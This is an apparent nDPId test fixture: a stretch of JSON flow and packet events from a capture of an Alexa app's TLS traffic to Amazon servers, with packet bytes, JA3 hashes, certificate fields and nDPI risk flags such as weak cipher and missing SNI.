+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071392,"flow_last_seen":1490976071392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071392,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":975,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1490976071392,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071392,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8hllAAEAGwJWsECrYNF7ohukyAbtO5dxqAAAAAKAC\/\/\/iygAAAgQFtAQCCAoA9lozAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":976,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1490976071431,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071431,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwichAAOcGFjI0XuiGrBAq2AG7soCzlhpDnkFxHnASH\/7eyAAAAgQFtAEDAwY="} +01630{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":979,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071306,"flow_last_seen":1490976071432,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3472,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1490976071432,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45694,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","alpn":"h2,http\/1.1","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":980,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1490976071433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071433,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKzBAAEAGG9OsECrYNF7ohrKAAbueQXEes5YaRFAQAVcpOgAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":983,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071380,"flow_last_seen":1490976071434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071434,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":986,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+BAAOcGWBo0XuiGrBAq2AG7sn8uyCJ8obvO6XASH\/76GQAAAgQFtAEDAwY="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":987,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1490976071438,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071438,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwR+FAAOcGWBk0XuiGrBAq2AG7soEpho4ZflMlBnASH\/5hCAAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":989,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAolMdAAEAGsjusECrYNF7ohrJ\/Abuhu87pLsgifVAQAVdEiwAA"} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":990,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1490976071440,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071440,"pkt":"AMDKkaPvePiC0\/vCCABFAAAofzhAAEAGx8qsECrYNF7ohrKBAbt+UyUGKYaOGlAQAVereQAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":991,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071349,"flow_last_seen":1490976071441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":992,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071385,"flow_last_seen":1490976071441,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071441,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":993,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071286,"flow_last_seen":1490976071444,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071444,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45693,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1490976071448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071448,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0V1AAOcGzpw0XuiGrBAq2AG76TIsDp+yTuXca3ASH\/6OPgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1490976071449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071449,"pkt":"AMDKkaPvePiC0\/vCCABFAAAohlpAAEAGwKisECrYNF7ohukyAbtO5dxrLA6fs1AQAVfYrwAA"} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1000,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071392,"flow_last_seen":1490976071451,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":194,"flow_tot_l4_payload_len":194,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1490976071451,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1006,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071380,"flow_last_seen":1490976071486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976071486,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45696,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1013,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071349,"flow_last_seen":1490976071501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071501,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45695,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01828{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1020,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976071392,"flow_last_seen":1490976071512,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3459,"flow_avg_l4_payload_len":494,"midstream":0,"thread_ts_msec":1490976071512,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":59698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}},"24": {"risk":"Missing SNI TLS Extension","severity":"Medium","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"","server_names":"pitangui.amazon.com,guipitan.amazon.com,alexa.amazon.com,echo.amazon.com,alexa.amazon.ca,guipitan.amazon.ca,alexa.amazon.co.jp,guipitan.amazon.co.jp,alexa.amazon.com.mx,guipitan.amazon.com.mx,alexa.amazon.com.br,guipitan.amazon.com.br,alexa.amazon.com.au,guipitan.amazon.com.au,alexa.amazon.cn,guipitan.amazon.cn","ja3":"36e9ceaa96dd810482573844f78a063f","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=pitangui.amazon.com","fingerprint":"13:E9:3B:22:22:61:41:53:CA:B6:3A:AE:C8:B7:23:FB:A5:11:2F:24"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976071583,"flow_last_seen":1490976071583,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976071583,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1039,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1490976071583,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976071583,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8H+ZAAEAGJwmsECrYNF7ohrKCAbsHHkWgAAAAAKAC\/\/\/3+QAAAgQFtAQCCAoA9lpGAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1057,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1490976071640,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976071640,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwgCVAAOcGH9U0XuiGrBAq2AG7soJWhIA2Bx5FoXASH\/6YhgAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1490976071641,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976071641,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoH+dAAEAGJxysECrYNF7ohrKCAbsHHkWhVoSAN1AQAVfi9wAA"} +00858{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1059,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976071583,"flow_last_seen":1490976071642,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976071642,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1063,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976071583,"flow_last_seen":1490976071700,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976071700,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45698,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1076,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976071385,"flow_last_seen":1490976071803,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1490976071803,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45697,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076042,"flow_last_seen":1490976076042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076042,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1113,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1490976076042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076042,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8BbZAAEAGQTmsECrYNF7ohpD5Abuu0lmyAAAAAKAC\/\/9b\/gAAAgQFtAQCCAoA9lwEAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1114,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":2,"flow_last_seen":1490976076114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076114,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwMG5AAOcGb4w0XuiGrBAq2AG7kPnjZM+NrtJZs3ASH\/4iEQAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1115,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":1490976076117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076117,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBbdAAEAGQUysECrYNF7ohpD5Abuu0lmz42TPjlAQAVdsggAA"} +00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1116,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976076042,"flow_last_seen":1490976076117,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076117,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01106{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1118,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976076042,"flow_last_seen":1490976076167,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1490976076167,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":37113,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f8f5b71e02603b283e55b50d17ede861","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976076275,"flow_last_seen":1490976076275,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976076275,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49613,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1128,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1490976076275,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976076275,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8Bx5AAEAGP9GsECrYNF7ohsHNAFDXKVsFAAAAAKAC\/\/8C1AAAAgQFtAQCCAoA9lwbAAAAAAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1130,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":2,"flow_last_seen":1490976076338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976076338,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwijBAAOcGFco0XuiGrBAq2ABQwc3F00\/v1ylbBnASH\/5mLQAAAgQFtAEDAwY="} +00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1131,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":76,"flow_packet_id":3,"flow_last_seen":1490976076340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976076340,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoBx9AAEAGP+SsECrYNF7ohsHNAFDXKVsGxdNP8FAQAVewngAA"} 